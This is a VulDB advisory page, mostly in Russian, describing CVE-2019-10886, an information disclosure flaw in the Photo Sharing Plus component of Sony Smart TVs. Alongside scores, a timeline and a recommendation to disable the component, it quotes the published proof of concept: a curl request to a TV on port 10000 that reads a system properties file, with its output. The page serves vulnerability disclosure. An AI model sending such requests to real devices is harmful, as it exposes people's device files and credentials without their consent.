VDB-134184 · CVE-2019-10886 · BID 108072

Sony Smart TV Photo Sharing Plus LJYT0010.JPG Credentials раскрытие информации

CVSS Meta Temp ScoreТекущая цена эксплойта (≈)Балл интереса CTI
5.4$0-$5k0.00

СводкаИнформация

Уязвимость была найдена в Sony Smart TV. Она была объявлена как проблематичный. Используемая неизвестная функция файла /contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG компонента Photo Sharing Plus. Выполнение манипуляции приводит к раскрытие информации (Credentials). Выявление этой уязвимости является CVE-2019-10886. Атаку можно инициировать удаленно. Более того, эксплойт доступен. Рекомендуется деактивировать соответствующий компонент.

ПодробностиИнформация

Уязвимость была найдена в Sony Smart TV. Она была объявлена как проблематичный. Используемая неизвестная функция файла /contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG компонента Photo Sharing Plus. Выполнение манипуляции приводит к раскрытие информации (Credentials). Указание проблемы через CWE ведет к CWE-200. Уязвимость была обнаружена 03.10.2018. Данная уязвимость была опубликована 23.04.2019 при поддержке xen1thLabs с идентификатором Multiple vulnerabilities in Sony Smart TVs в виде Mailinglist Post (Bugtraq) посредством HackerOne. Консультация представлена на сайте seclists.org. Публичное раскрытие информации было согласовано с продавцом.

Выявление этой уязвимости является CVE-2019-10886. Присвоение CVE было выполнено 05.04.2019. Атаку можно инициировать удаленно. Технические детали доступны. Данная уязвимость менее популярна, чем в среднем. Более того, эксплойт доступен. Эксплойт стал общедоступным и может быть использован. Текущая цена за эксплойт может составлять около USD $0-$5k в настоящее время. Проект MITRE ATT&CK использует технику атаки T1592 для этой проблемы.

Задано как Доказательство концепции. Эксплойт доступен для загрузки по адресу seclists.org. Данная уязвимость была эксплуатируема как непубличный 0-day эксплойт по меньшей мере 202 дней. В качестве 0-day ориентировочная цена на подпольном рынке составляла около $5k-$25k. Код, используемый эксплойтом:

root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop
Trying 192.168.1.102...
TCP_NODELAY set
Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0)
> GET /contentshare/image/default.prop HTTP/1.1
> Host: 192.168.1.102:10000 
> User-Agent: curl/7.58.0
> Accept: /
>
< HTTP/1.1 200 OK
< Connection: close
< Content-Length: 591
< Content-Type: application/octet-stream
<

  1. 

  2. ADDITIONAL_DEFAULT_PROPERTIES
    3. 
#
ro.secure=1
security.perf_harden=1
ro.allow.mock.location=0
ro.debuggable=0 ro.zygote=zygote32
dalvik.vm.image-dex2oat-Xms=64m
dalvik.vm.image-dex2oat-Xmx=64m
dalvik.vm.dex2oat-Xms=64m dalvik.vm.dex2oat-Xmx=512m
ro.dalvik.vm.native.bridge=0 debug.atrace.tags.enableflags=0 

  3. 

  4. BOOTIMAGE_BUILD_PROPERTIES 
    5. 

  5. 
ro.bootimage.build.date=2016? 11? 14? ??? 15:34:56 JST ro.bootimage.build.date.utc=1479105296     
ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys 
persist.sys.usb.config=none


Closing connection 0
.

Рекомендуется деактивировать соответствующий компонент. В рекомендациях приведено следующее замечание:

Sony confirms the vulnerabilities affects some models and "Sony plans to terminate Photo Sharing Plus service for all of models, and that completion date is scheduled for April 12th, 2019."

ПродуктИнформация

Тип

Поставщик

Имя

Лицензия

CPE 2.3Информация

CPE 2.2Информация

CVSSv4Информация

VulDB Вектор: 🔍
VulDB Надёжность: 🔍

CVSSv3Информация

VulDB Meta Base Score: 5.5
VulDB Meta Temp Score: 5.4

VulDB Базовый балл: 5.3
VulDB Временная оценка: 4.9
VulDB Вектор: 🔍
VulDB Надёжность: 🔍

Исследователь Базовый балл: 5.3
Исследователь Вектор: 🔍

NVD Базовый балл: 5.9
NVD Вектор: 🔍

CVSSv2Информация

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
ВекторСложностьАутентификацияКонфиденциальностьЦелостностьДоступность
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать

VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надёжность: 🔍

NVD Базовый балл: 🔍

ЭксплуатацияИнформация

Имя: Credentials
Класс: раскрытие информации / Credentials
CWE: CWE-200 / CWE-284 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍

Физический: Нет
Локальный: Нет
Удалённый: Да

Доступность: 🔍
Доступ: публичный
Статус: Доказательство концепции
Скачать: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Прогноз цен: 🔍
Оценка текущей цены: 🔍

0-DayРазблокироватьРазблокироватьРазблокироватьРазблокировать
СегодняРазблокироватьРазблокироватьРазблокироватьРазблокировать

Разведка угрозИнформация

Интерес: 🔍
Активные акторы: 🔍
Активные группы APT: 🔍

КонтрмерыИнформация

Рекомендация: Отключить
Статус: 🔍

0-дневное время: 🔍
Задержка эксплуатации: 🔍

Firewalling: 🔍

ХронологияИнформация

03.10.2018 🔍
10.10.2018 +7 дни 🔍
12.10.2018 +2 дни 🔍
05.04.2019 +175 дни 🔍
23.04.2019 +18 дни 🔍
23.04.2019 +0 дни 🔍
29.04.2019 +6 дни 🔍
13.06.2024 +1872 дни 🔍

ИсточникиИнформация

Консультация: Multiple vulnerabilities in Sony Smart TVs
Организация: xen1thLabs
Статус: Подтверждённый
Подтверждение: 🔍
Скоординированный: 🔍

CVE: CVE-2019-10886 (🔍)
GCVE (CVE): GCVE-0-2019-10886
GCVE (VulDB): GCVE-100-134184
SecurityFocus: 108072

scip Labs: https://www.scip.ch/en/?labs.20161013
Разное: 🔍
Смотрите также: 🔍

ВходИнформация

Создано: 29.04.2019 09:24
Обновлено: 13.06.2024 08:48
Изменения: 29.04.2019 09:24 (83), 04.06.2020 15:23 (2), 07.09.2023 22:08 (5), 13.06.2024 08:48 (14)
Завершенный: 🔍
Cache ID: 216::103

VulDB is the best source for vulnerability data and more expert information about this specific topic.

Обсуждение

Комментариев пока нет. Языки: ru + be + en.

Пожалуйста, войдите в систему, чтобы прокомментировать.

ПредыдущийОбзорДалее

Might our Artificial Intelligence support you?

Check our Alexa App!